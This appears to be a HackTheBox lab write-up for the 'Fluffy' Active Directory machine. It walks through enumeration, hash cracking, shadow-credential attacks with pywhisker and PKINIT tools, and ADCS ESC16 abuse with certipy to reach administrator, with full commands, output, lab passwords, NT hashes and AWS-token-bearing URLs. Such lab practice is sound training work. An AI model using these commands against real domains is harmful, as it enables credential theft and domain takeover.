HackTheBox · Lab
Fluffy

Fluffy

EasyWindowsActive Directory

NOTES

ENUMERATION

NMAP


    ```shell
    PORT      STATE SERVICE
    53/tcp    open  domain
    88/tcp    open  kerberos-sec
    139/tcp   open  netbios-ssn
    389/tcp   open  ldap
    445/tcp   open  microsoft-ds
    464/tcp   open  kpasswd5
    593/tcp   open  http-rpc-epmap
    636/tcp   open  ldapssl
    3268/tcp  open  globalcatLDAP
    3269/tcp  open  globalcatLDAPssl
    5985/tcp  open  wsman
    9389/tcp  open  adws
    49667/tcp open  unknown
    49681/tcp open  unknown
    49682/tcp open  unknown
    49689/tcp open  unknown
    49694/tcp open  unknown
    49705/tcp open  unknown
    49721/tcp open  unknown
    ```


SMB


    Guest enum shares success


    As `j.fleischman` we have `READ/WRITE` on share `//IT`


    We also found interesting files. PDF giving us hints on which CVE’s the server is vulnerable too. After research we found this:


    [link_preview]()


    After the usage of exploit, we captured an NTLMv2 with responder.


    ![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/3931c444-1e47-436e-8c37-b9736ab8b24e/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB4666OQAA657%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082841Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJIMEYCIQDId%2F%2BfCSl%2BpixoMKRzry8wCF03ObqcgHwIAqzI78NVWQIhAPB3U8WpyeYrJvh3crFpqZKcGrJYU0bzPjHtu%2Fm5YptoKv8DCCkQABoMNjM3NDIzMTgzODA1IgzhGTZoQxj0%2F740iZ4q3AOgx1Emzb381LXeUvtYvHqjTLjDsSQSBfHyTSGdKVtT9f3zPHQCpdgDdxbvKPESqqziFExynYpRWjvkQI0ApG1w2Rl4cB4VWHOdl%2BcRE7%2Fi%2Frz1s3lyFQNRHGVJnqI6M1HPCZ7%2B2ku2H332OI8zAL7uCKyY73SrjnZHNNBm2qb97yF57%2BGAKvqRdJ02qGFpd7WlflBX1CQN4Z3vc9DV860ZowhmdpvN%2FwHS6wNSq19gBasoJ%2B51QA3eK7gsGwG9S1pD5EGzJv4tKWUq4vrxrFWoQ%2FUElxGwX57VmZdZCn5SarCpr97xJE6PtJxkIAGaZoCBdOmZdM2twtlO1gx2ve5y8yGu5Tu98ozd9zMClhPeyp7QEeRB7BOngp2GpgX1q1fV4nNlen15BE9aN97NT9KbCHCQiiMYPOLm9300cQhFaPipYVqQ0X9NfZxFIzoS6u2MsaEeiBL78epJwnk9nYkjw%2BQLwAV6YBo1jwB%2FzdzRl8RyF73mxH5xC%2F%2BF%2FqMoOa0BaxziWnggjbTg1usQaJBcAoqR7VoSIfwGyMdcMfEeNcXu3zlWnZP1LNVVH7KDxmuW6XmNf5rQps%2FuAvWU39pljp3PNYzF8lLjxzJ%2FPaQHHYpluq%2BOl5X3Z6WAGTD087nNBjqkATBHRsP50LGiRRIAkw8wfmqc7VNDaDGgYcVHsLxnladQ4qCbu2L11wi%2B6LGYiyfOt2DOrX%2BrzoKP4XZeAiLKVBqPW2gHgkOTwVcr1gqSDOG5t7N7jc2GnLT3Y3ZKu%2BAypV7CTUfwy0gVAYVSKcMRPaLoXbNle8o1z%2BdLg2wnAiCtCQ7i0PNO7TzXoXm9npDQpO1dtxnlptjCqU4IfdG3FKzDMwPy&X-Amz-Signature=478fb7e0afecb36f3fe39f8f2566b833125489f722cd601f732b4defe9590c17&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


    Cracked with hashcat:

    - prometheusx-303

ADCS


    ```shell
    ❯ nxc ldap $IP -u $USER -p $PASS -M adcs
    LDAP        10.10.11.69     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
    LDAP        10.10.11.69     389    DC01             [+] fluffy.htb\p.agila:prometheusx-303 
    ADCS        10.10.11.69     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
    ADCS        10.10.11.69     389    DC01             Found PKI Enrollment Server: DC01.fluffy.htb
    ADCS        10.10.11.69     389    DC01             Found CN: fluffy-DC01-CA
    ```

    - fluffy-DC01-CA

BLOODHOUND


    Possible path


    ![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/6871c56a-1cc8-457d-9862-247783a2e900/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466XZU2B7HQ%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082841Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJHMEUCIF8VczI3F5N3tl1LAhQP%2Fn7F8SbFSY62sjhgiG%2FgoEHHAiEAiUNCLKbAYYedyawmYYOudbzGK%2FhuZaMmYb3sYhfqBrcq%2FwMIKRAAGgw2Mzc0MjMxODM4MDUiDMNvUbxwasL0SPkRESrcAwEBHhhH9CK8o94n2spN0gno%2FNHJghT4VyWbTrdevGBA06SiF6IL8Et7DoV0OTfYS4IXe6Sz0dHCRYxgLf6YaWcAflrLwWw%2B6C9%2F6m2RCswFicCSvWKccLsYW%2BnuYScIaVX76y3r6vNdq7i9RoIJXy1AaTY%2FW12JNQhslelTlIKldQek%2BQW09Z%2B9Fgm8EBsDospVpRBHbz%2B9s4%2Bmw6rY8rhoKtS%2BCf11EpVTKsXtJluUpCMG7PhWCu8iUEv%2BSU9Z1IOmr4Rh9PIlPUYYhTvFU1b6F9mXhYO6sBiwliB1YHAeSLOPWy8g6K%2BPbryj30%2Bo6RMx6Sg3OE%2FmsrM9MG%2Ftc4p7h4H%2BFm7vefTmrWeP%2BSjPh5MP6%2BK2g8ttGjD%2BKN%2BuqMtYCTL%2FBH7FbCTfWGC6Q5SqoqrdivqKkH5uH1GVT4thhtz3MVIBG1fyTJynnxTWKR3TLpuvnOK2XUKfzOkMobZyCAIpJ2ixHf42u9ltTbpToOjXLS%2B29E2zRL1NzKl%2BAc%2BKzpWRMnxMAYINX0JKmSv1TVIZE3Ul3AxFd8QB1k48N3%2B%2FijT6FvUPRQtdcXTiWUjxF0NRRJtHqv3VIx%2BHTgqiskxTm7n1S3VKhpHsAgdmbbbAm7pTtRIKv%2FQ7MO%2Fzuc0GOqUBgQo%2F2TxMQjo1lwnEYWuUb%2FPtMCqIhiRNoTUTx64ed3B%2FJO3KGc0L8t97S6JqYA6WYao7BdGchTtpdPntiOQF4YwFS%2FqiJWUZieF6NrfWQ8dRqqlR2TprZ1fzkJZkplaPKZFVj5%2FhJ3WLpNRJjRwNTBteu8EqTPQmEZfxPOCtOVtmnPdoRFFi2RRX5bgCahmPoYruGUMZTXQYDRyMokCG9e1go%2FHE&X-Amz-Signature=f5240e83a42202e3367ca667e203a6c11ae8b2a5f8906b0fb988acc2d1efb8f7&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

FOOTHOLD

ATTACK VECTOR USER LEVEL


    ![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/6871c56a-1cc8-457d-9862-247783a2e900/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466Z5GYSQQF%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082842Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJGMEQCIB1ANZ6Hc6b9xKvp0256yFFl61o1RaS8z7l5OsdCSAB0AiADnOZpznXVksG2l%2FjjbgGkVLkrd%2FethOF497Yhrai4KSr%2FAwgpEAAaDDYzNzQyMzE4MzgwNSIMJrOINKGrWnawNcmVKtwD88%2BwvKHDDf%2BT7azWsfKGQL0rHBWR61Ek8V%2FIV%2B46yfXH0F3KNk7clboh15xmSQNIyaekkyiWIueoEs0CHziC6QqhgqMReIzRHF%2FlzoV%2FwjwHaLZJgJPhfrXLttpSdCaEwVMueAQZQx4bdmYA0MfaJnuzVkxTtQUdnhL0K5J5ezo1wHjHPyeCWcBiykIpidO18MVHqTnuu8BJkSh9lpyZBGwRYfQF9za3emBkeZjPgn%2BykIWzc%2BvMG0Hh%2BT1FOZIAFMbAKqJuf6DtT9b2AiVD5edOck2M%2BUSne4JN1J%2FbvqGJ1MUjbTH0r9zlwfm36nP1yc9qBKkQVLYrZt%2Bp0OGjTBLeO2Z%2BPtm8a4MYHVxqYw4BZlrT2%2FO2PFhENxADEMramnNMGfnVeKCMNcbZ%2FbSq%2BlhAtDkhijEELHCGzySGU18pY1U5WX5KS3VpDWwjDq8KoA6boK3NTMapUpQshrsIuIH%2FCnpHypBrLDqujX8z5UT2oKgAtMUfI4f70cnCs%2Bsm3FbT8Eb1f5CRZyKCWvH0jf6913PmBT8bdfUjPMod%2BhUVD4%2B3Utqz56fsMIZ2I7H6jJtQnW%2BkRmSHW0sc%2FcOYy%2F5jAmU2fxFM03eMbGFonedDWa5%2FI1OfYdunN%2FQwkfS5zQY6pgEx3W8zrZ8oxx5wRPlX1neeloQ6omyveeWFiQhOJD%2BcS8Kt4bAitC40I07DGPq9QAb%2FjS3LNE70qqocJePMqlsNvS8mTzOL64nvM%2BWUZoPmkc%2F6I8c0pnmx1dcdQmVoxOmT1b6sjhumglqVAhixl7r2njr%2FcCzVx3aUh0zKclHp4NPYLGsnFkO5lv%2B9wkM6oJ%2BBGEmaGuKTpsVqC%2BSixA23MjBPueA1&X-Amz-Signature=333453e53b08c4061d5acd849fa3f67d8431bb8f36b686f09620ce3f6644ec9c&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)


    Since `p.agila` is a member of `SERVICE ACCOUNTS MANAGERS` which has `GenericAll` to the `SERVICE ACCOUNTS` group and the `SERVICE ACCOUNTS` has `GenericWrite` relationship to `ca_svc` , `ldap_svc` & `winrm_svc` we can follow this path. 


    With the `GenericAll` we can directly modify the group members so we can add `p.agila` to `SERVICE ACCOUNTS` and after that we can do a `Shadow Credential Attack`to any of the previous mentioned accounts.


ADD `p.agila` to `SERVICE ACCOUNTS`


    ```shell
    net rpc group addmem "SERVICE ACCOUNTS" "p.agila" -U "FLUFFY.HTB"/"p.agila"%"prometheusx-303" -S "DC01.FLUFFY.HTB"
    ```


    Then we proceed with `pyshisker`, `gettgtpkinit` & `getnthash` to make certificates, obtain the TGT and the NT hashes. The first account I tried to attack was `winrm_svc` just because it has remote access rights and we can attempt to do `evil-winrm`. 


PYWHISKER


    ```shell
    ❯ pywhisker.py -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "winrm_svc" --action "add"
    [*] Searching for the target account
    [*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
    [*] Generating certificate
    [*] Certificate generated
    [*] Generating KeyCredential
    [*] KeyCredential generated with DeviceID: c51277de-6740-f0cf-e65b-2f26a48aac6b
    [*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
    [+] Updated the msDS-KeyCredentialLink attribute of the target object
    [*] Converting PEM -> PFX with cryptography: yHBfrZXx.pfx
    [+] PFX exportiert nach: yHBfrZXx.pfx
    [i] Passwort für PFX: hOuFC8p5rGy1HnPsnRvL
    [+] Saved PFX (#PKCS12) certificate & key at path: yHBfrZXx.pfx
    [*] Must be used with password: hOuFC8p5rGy1HnPsnRvL
    [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
    ```


GETTGTPKINIT


    ```shell
    ❯ gettgtpkinit.py -cert-pem yHBfrZXx_cert.pem -key-pem yHBfrZXx_priv.pem fluffy.htb/winrm_svc winrm_svc.ccache
    2025-08-01 23:49:17,595 minikerberos INFO     Loading certificate and key from file
    INFO:minikerberos:Loading certificate and key from file
    2025-08-01 23:49:17,603 minikerberos INFO     Requesting TGT
    INFO:minikerberos:Requesting TGT
    2025-08-01 23:49:18,671 minikerberos INFO     AS-REP encryption key (you might need this later):
    INFO:minikerberos:AS-REP encryption key (you might need this later):
    2025-08-01 23:49:18,671 minikerberos INFO     b218f1a8c6c39d7e2d7cbf28d033f2180bb0bf66ee83b30b1cb4cae9d7063dbe
    INFO:minikerberos:b218f1a8c6c39d7e2d7cbf28d033f2180bb0bf66ee83b30b1cb4cae9d7063dbe
    2025-08-01 23:49:18,679 minikerberos INFO     Saved TGT to file
    INFO:minikerberos:Saved TGT to file
    ```


EXPORRT KRB5


    ```shell
    export KRB5CCNAME=winrm_svc.ccache
    ```


GETNTHASH with generated key


    ```shell
    ❯ getnthash.py -key b218f1a8c6c39d7e2d7cbf28d033f2180bb0bf66ee83b30b1cb4cae9d7063dbe fluffy.htb/winrm_svc
    Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 
    
    [*] Using TGT from cache
    [*] Requesting ticket to self with PAC
    Recovered NT Hash
    33bd09dcd697600edf6b3a7af4875767
    ```


EVIL-WINRM as `winrm_svc`


    ```shell
    evil-winrm -i 10.10.11.69 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
    ```

PRIVILEGE ESCALATION

PRIVESC TO ADMIN


Same procedure as previous but this time we choose `ca_svc`


PYWHISKER


    ```shell
    ❯ pywhisker.py -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "ca_svc" --action "add"
    [*] Searching for the target account
    [*] Target user found: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
    [*] Generating certificate
    [*] Certificate generated
    [*] Generating KeyCredential
    [*] KeyCredential generated with DeviceID: afe4586a-4bea-9f52-6afa-f1c5c9712284
    [*] Updating the msDS-KeyCredentialLink attribute of ca_svc
    [+] Updated the msDS-KeyCredentialLink attribute of the target object
    [*] Converting PEM -> PFX with cryptography: uswoiVwj.pfx
    [+] PFX exportiert nach: uswoiVwj.pfx
    [i] Passwort für PFX: WxWYLP4GLl9WUElhY8FH
    [+] Saved PFX (#PKCS12) certificate & key at path: uswoiVwj.pfx
    [*] Must be used with password: WxWYLP4GLl9WUElhY8FH
    [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
    ```


GETTGTPKINIT


    ```shell
    ❯ gettgtpkinit.py -cert-pem uswoiVwj_cert.pem -key-pem uswoiVwj_priv.pem fluffy.htb/ca_svc ca_svc.ccache
    2025-08-01 23:56:42,265 minikerberos INFO     Loading certificate and key from file
    INFO:minikerberos:Loading certificate and key from file
    2025-08-01 23:56:42,273 minikerberos INFO     Requesting TGT
    INFO:minikerberos:Requesting TGT
    2025-08-01 23:56:51,724 minikerberos INFO     AS-REP encryption key (you might need this later):
    INFO:minikerberos:AS-REP encryption key (you might need this later):
    2025-08-01 23:56:51,724 minikerberos INFO     f04ebf8a824a166636a1549e6594c6ae258e2800210871816cc79c369259592a
    INFO:minikerberos:f04ebf8a824a166636a1549e6594c6ae258e2800210871816cc79c369259592a
    2025-08-01 23:56:51,731 minikerberos INFO     Saved TGT to file
    INFO:minikerberos:Saved TGT to file
    ```


EXPORT KRB5


    ```shell
    export KRB5CCNAME=ca_svc.ccache
    ```


GETNTHASH


    ```shell
    ❯ getnthash.py -key f04ebf8a824a166636a1549e6594c6ae258e2800210871816cc79c369259592a fluffy.htb/ca_svc
    Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 
    
    [*] Using TGT from cache
    [*] Requesting ticket to self with PAC
    Recovered NT Hash
    ca0f4f9e9eb8a092addf53bb03fc98c8
    ```


CERTIPY ENUM/VULN CHECK


    ```shell
    ❯ certipy-ad find -vulnerable -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -stdout
    Certipy v5.0.2 - by Oliver Lyak (ly4k)
    
    [*] Finding certificate templates
    [*] Found 33 certificate templates
    [*] Finding certificate authorities
    [*] Found 1 certificate authority
    [*] Found 11 enabled certificate templates
    [*] Finding issuance policies
    [*] Found 14 issuance policies
    [*] Found 0 OIDs linked to templates
    [*] Retrieving CA configuration for 'fluffy-DC01-CA' via RRP
    [!] Failed to connect to remote registry. Service should be starting now. Trying again...
    [*] Successfully retrieved CA configuration for 'fluffy-DC01-CA'
    [*] Checking web enrollment for CA 'fluffy-DC01-CA' @ 'DC01.fluffy.htb'
    [!] Error checking web enrollment: timed out
    [!] Use -debug to print a stacktrace
    [!] Error checking web enrollment: timed out
    [!] Use -debug to print a stacktrace
    [*] Enumeration output:
    Certificate Authorities
      0
        CA Name                             : fluffy-DC01-CA
        DNS Name                            : DC01.fluffy.htb
        Certificate Subject                 : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
        Certificate Serial Number           : 3670C4A715B864BB497F7CD72119B6F5
        Certificate Validity Start          : 2025-04-17 16:00:16+00:00
        Certificate Validity End            : 3024-04-17 16:11:16+00:00
        Web Enrollment
          HTTP
            Enabled                         : False
          HTTPS
            Enabled                         : False
        User Specified SAN                  : Disabled
        Request Disposition                 : Issue
        Enforce Encryption for Requests     : Enabled
        Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
        Disabled Extensions                 : 1.3.6.1.4.1.311.25.2
        Permissions
          Owner                             : FLUFFY.HTB\Administrators
          Access Rights
            ManageCa                        : FLUFFY.HTB\Domain Admins
                                              FLUFFY.HTB\Enterprise Admins
                                              FLUFFY.HTB\Administrators
            ManageCertificates              : FLUFFY.HTB\Domain Admins
                                              FLUFFY.HTB\Enterprise Admins
                                              FLUFFY.HTB\Administrators
            Enroll                          : FLUFFY.HTB\Cert Publishers
        [!] Vulnerabilities
          ESC16                             : Security Extension is disabled.
        [*] Remarks
          ESC16                             : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
    Certificate Templates                   : [!] Could not find any certificate templates
    ```


    This stands out!


    ```shell
    [!] Vulnerabilities
          ESC16                             : Security Extension is disabled.
    ```


Read initial UPN of the victim account


    ```shell
    ❯ certipy-ad account -u 'p.agila@fluffy.htb' -p 'prometheusx-303' -dc-ip '10.10.11.69' -user 'ca_svc' read
    Certipy v5.0.2 - by Oliver Lyak (ly4k)
    
    [*] Reading attributes for 'ca_svc':
        cn                                  : certificate authority service
        distinguishedName                   : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
        name                                : certificate authority service
        objectSid                           : S-1-5-21-497550768-2797716248-2627064577-1103
        sAMAccountName                      : ca_svc
        servicePrincipalName                : ADCS/ca.fluffy.htb
        userPrincipalName                   : ca_svc@fluffy.htb
        userAccountControl                  : 66048
        whenCreated                         : 2025-04-17T16:07:50+00:00
        whenChanged                         : 2025-08-01T21:56:52+00:00
    ```


Lets Update the victim account´s UPN to the target administrator’s sAMAccountName


    ```shell
    ❯ certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes ':33bd09dcd697600edf6b3a7af4875767' -dc-ip '10.10.11.69' -upn 'administrator' -user 'ca_svc' update
    Certipy v5.0.2 - by Oliver Lyak (ly4k)
    
    [*] Updating user 'ca_svc':
        userPrincipalName                   : administrator
    [*] Successfully updated 'ca_svc'
    ```


Request a certificate as the “victim” user from any suitable client authentication template (e.g., “User”) on the ESC16-vulnerable CA


    ```shell
    ❯ certipy-ad req -k -dc-ip '10.10.11.69' -target 'DC01.FLUFFY.HTB' -ca 'fluffy-DC01-CA' -template 'User'
    Certipy v5.0.2 - by Oliver Lyak (ly4k)
    
    [!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
    [*] Requesting certificate via RPC
    [*] Request ID is 15
    [*] Successfully requested certificate
    [*] Got certificate with UPN 'administrator'
    [*] Certificate has no object SID
    [*] Try using -sid to set the object SID or see the wiki for more details
    [*] Saving certificate and private key to 'administrator.pfx'
    [*] Wrote certificate and private key to 'administrator.pfx'
    ```


Revert the “victim” account’s UPN


    ```shell
    ❯ certipy-ad account -u 'winrm_svc@fluffy.htb' -hashes ':33bd09dcd697600edf6b3a7af4875767' -dc-ip '10.10.11.69' -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
    Certipy v5.0.2 - by Oliver Lyak (ly4k)
    
    [*] Updating user 'ca_svc':
        userPrincipalName                   : ca_svc@fluffy.htb
    [*] Successfully updated 'ca_svc'
    ```


Let’s authenticate as `administrator`


```shell
❯ certipy-ad auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'administrator' -domain 'fluffy.htb'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator'
[*] Using principal: 'administrator@fluffy.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
```

SYSTEM OWNAGE

![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/279d9897-546b-43a4-a938-00b32a53ad82/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB4663N6TZHFI%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082848Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJIMEYCIQD%2F7JVAUUmL%2Bg7HfOu8lALZC9D3B1bJk7a3mUkuXiT8jgIhAK5D51eFl3fSMSpBPrKb2PX4GYDMuHa%2BzzUgY8w2nzgXKv8DCCkQABoMNjM3NDIzMTgzODA1IgyauyNra3%2FUdnEzHnQq3AN90ZhBQ%2FYCdmkW67doxCwJAuPf7TdU4HQdoFojkHrb%2BdvT%2Fpckdy0ffr0RZhfE0iTTaVR2lwBi3gD2CGsD39NMY%2BRaHMK006mDWuYAgWVVtBJIz1JVLpVC11i8ISoMj%2BJYjRPAKwr2qDFtXcx3UVt0Rm%2FCOfPoSxISVvZlkZQOAmJVbxv0%2B7Nyw8S4xM%2Fa0B%2FlslEDsmq8lzT40RWvszkNr%2FelM0imEDsHnVuiG9NTecJlXwvBclOJBOXb1eH7ZNr4MW8ADR2m%2FJG%2B%2F1R2aFivIIGonk8qVhor5YIX6gW0fc2SLpF1M7Yb9Gs18j%2FQIVGdtNUr3cWcPK0soXbJq8xOP33Bs%2FnA1VaiPF5BcrDvUDcMffDioeD3XbDp2wjY8cMwxBi8Lcyo%2BOXVx1iMzUH6r7RxTpyWJ6GDaR3vBg80rA58116%2BUC8pRxLdT9AlhH5H4gqKQLTRtGOVTQYVBVJWS22fsIBrl7m9%2FiHc4t6UrLRqyZtfXl7m%2F7W%2BbtxjihZpe4YHAky7np2nk5KuIZO4o7hWieQovF9E2pJsfnmRRfdxWmOKc%2BHJOyWetRVhT0PShQA6yRqheyI4%2B%2FIVnDbXfofGpK7T%2FfH7Xso%2FIJg0PQ2A6Yd8Nt%2BlckKqrTDx87nNBjqkAZD4uBpARETTfkE5mptTKrAFeqRCwQWQy8f2cSW%2BCldHWiVC%2BcElaop9Wx0Exu%2BEq%2FMpfQEjECMwgekztyVtOR2x3gXmKYuX5xjBddujLpiqxtjNAurZIMlHMQLJShwsIdMzPOygC88ywwDLiEr0P7c5E2KkKD4hAteWIJEtvDaA%2Bmh7usXsu%2BzoBgRSH%2FQHGV9G2nu4zqxRxo3fLgsWkaJhP%2BF%2F&X-Amz-Signature=49334b024cd81c7cb65c191c8c449f9e30be4c4a43bae3c7c2252127197b91c7&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

CLEANUP

Nothing to clean

image.png

SCOPE

IP HOSTNAME DOMAIN NAME OS
10.10.11.69 DC01 fluffy.htb Win10/Srv19 B:17763 x64

WEB SERVICE TECHNOLOGY

WEB

No webb

NIKTO

WFUZZ / GOBUSTER

FILES

DIRS

SUBDIRS

VHOSTS

USERS

```shell
Administrator
Guest
krbtgt
ca_svc
ldap_svc
p.agila
winrm_svc
j.coffey
j.fleischman
```

CREDENTIALS

```shell
j.fleischman:J0elTHEM4n1990!
p.agila:prometheusx-303
```

NMAP

```shell
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49681/tcp open  unknown
49682/tcp open  unknown
49689/tcp open  unknown
49694/tcp open  unknown
49705/tcp open  unknown
49721/tcp open  unknown
```

SMB SHARES

```shell
Shares           
-----           
ADMIN$          
C$              
IPC$            
IT              
NETLOGON        
SYSVOL
```

OTHER NOTES

```shell
ADCS, Kerberos, Pywhisker, gettgtpkinit
```

LOGS

[file](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/59a42f10-2f86-4609-b6f4-9839c4ed016d/fluffy.fullnmap?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB4664K2ALYRS%2F20260309%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260309T082850Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEGAaCXVzLXdlc3QtMiJIMEYCIQD8a8jPTAd%2Fww4InhbpPuJOm0tQ3XIRpbB%2Bxu1kcLJKKgIhAInN7YErW0QdAuFXK8KfsEN3BApTJIUvsS9ZZ3UzYVUyKv8DCCkQABoMNjM3NDIzMTgzODA1IgzFl93svfTbu6Nt7WQq3AM5KM%2F%2FLpPDAhR07RmyRTDJt25iqjXi2l2ESRVyddyShNaYqp5x53ldMBO%2BvDuRwzw80hkPwgzQFj8wfbfplyYKwc0KlmjGzaaxP7X%2FDbv0ZBhnJxjxDaDn8sdcTcsgK20JFzPxf154JSvZOuO%2F53A5xWhcvnlXLwM7dB8xXMWM3C7iWEwFB4KBDOTtRqOR7hggMjtZIxcBfcp3zy1shX3PAfubBltBRX0VM8gd5J6Kxt%2FiwC%2FdlpwmRkJUYTiNwNHyVqXilHnF2Dbsllmj3DQMG6pp1xxFneI0zKwyArndAkGaOEaiL7Q%2BYRCU94qcOC3CrtJmU%2B13LpAE9qGCSbCoreC5M%2Bif%2FM6j3EN74X8SNOZkVmLDXTmWe7DlZ4wxVJPd36ZA%2BrhQAK19ZDdCj8KjqwBkGDoWRD2Ckx50lgnJyq%2F8E5tbGWsZt8ka1VgV%2FFFmVk%2BMm3ks%2BVfLUfKm2aAbZvY1BLsgCeSUuA1G9WRF1J2XvP9PXAIAT%2FWJWtfM2eMmuKM1Pl3Ii6FrFcw1W7W74k9SEQpQ1yu5XUu6nwgFDAVMuNzQAVbYUUGDdaM57FxR1FKBPnVNgUTnjNUsl6Rz60uTxZ1pKR%2FM2Flg73RMh5IB1OfKG1snUxZBczDv87nNBjqkAf7FVJaRoLycDMOvgxiBhfrxMlageZLO%2FxERTPxOCJHSwhM8i04sNuUaXWUG1HJQ9lH1YAxb5e%2BpvkoxmBu%2BRvG6wk4wcdsSMNUXoxXp%2BUCDtKnMG1c3iHd6eujY2LhbnEiGsy2uSUgAIunBYODAcnvseAtNW3ZWsZceqxnd3ACd88x8NubkxYctzFbpCvNw3RCsUlzD%2FNkG215%2FioRNtCZwVZcD&X-Amz-Signature=b8b6542c6666d5b12664db816f67a3909780bc6586032be12bfaebe4596f8b23&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

0xNRG